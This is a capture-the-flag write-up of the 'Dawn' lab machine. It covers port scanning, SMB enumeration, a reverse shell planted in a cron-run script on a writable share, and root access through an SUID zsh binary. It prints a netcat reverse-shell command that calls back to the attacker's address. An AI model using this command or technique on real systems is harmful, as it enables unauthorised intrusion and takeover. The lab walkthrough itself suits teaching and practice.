Security Analyst | Security Researcher | CRTP

Proving grounds Play: Dawn

Proving grounds Play - Dawn CTF writeup.

Nmap

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1

Web PORT: 80

Directory Fuzzing

img

Logs

img

SMB Enumeration

smbclient -L //192.168.175.11/ -N

img

As per the management.log file there is a cron job running on ITDEPT folder, and in SMB we have access to the ITDEPT folder.

2020/08/12 09:03:02 [31;1mCMD: UID=1000 PID=939    | /bin/sh -c /home/dawn/ITDEPT/product-control [0m

Create file named product-control add a reverse shell code to the file and upload it in the SMB server.

#!/bin/bash
nc -c bash 192.168.45.223 1234

So when the cronjob runs the script we will get the reverse shell.

img

Wait for few seconds for the cron job to run.

img

Initial Foothold Obtained

Privilege Escalation

Check the user permissions sudo -l the user Dawn has permission to run /usr/bin/msql without password. But unfortunately it didn’t work.

SUIDs

dawn@dawn:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh #Odd to be here
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn

The SUID zsh is exploitable, direct to GTFO bins and find the exploit.

img

Root Obtained

Thanks for reading!

For more updates and insights, follow me on Twitter: @thevillagehacker.